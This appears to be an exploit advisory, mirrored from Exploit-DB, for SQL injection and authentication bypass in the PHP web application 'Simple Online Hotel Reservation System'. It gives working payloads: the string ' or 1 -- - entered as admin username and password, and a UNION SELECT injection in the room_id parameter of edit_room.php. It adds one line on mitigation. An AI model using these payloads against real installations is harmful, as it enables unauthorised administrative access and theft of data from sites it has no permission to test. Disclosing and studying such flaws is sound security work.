Simple Online Hotel Reservation System - SQL Injection / Authentication Bypass

vendor:

Simple Online Hotel Reservation System

by:

Mr Winst0n

8.8

CVSS

HIGH

SQL Injection / Authentication Bypass

CWE

Product Name: Simple Online Hotel Reservation System

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali linux, Windows 8.1

2019

Simple Online Hotel Reservation System – SQL Injection / Authentication Bypass

Go to admin login page (http://localhost/[PATH]/admin/index.php), then use below payload as username and password => Username: ' or 1 -- - Password: ' or 1 -- -. http://localhost/[PATH]/admin/edit_room.php?room_id=4 [SQLi] http://localhost/[PATH]/admin/edit_room.php?room_id=-4%27union%20select%201,2,3,4%20--%20-

Mitigation:

Input validation, parameterized queries, and stored procedures should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Simple Online Hotel Reservation System  - SQL Injection / Authentication Bypass
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 25, 2019
# Vendor Homepage: https://code-projects.org/
# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/
# Tested on: Kali linux, Windows 8.1 


# PoC:

# Authentication Bypass:

# Go to admin login page (http://localhost/[PATH]/admin/index.php), then use below payload as username and password => Username: ' or 1 -- -			
			Password: ' or 1 -- -

# SQL Injection:

# http://localhost/[PATH]/admin/edit_room.php?room_id=4 [SQLi]
# http://localhost/[PATH]/admin/edit_room.php?room_id=-4%27union%20select%201,2,3,4%20--%20-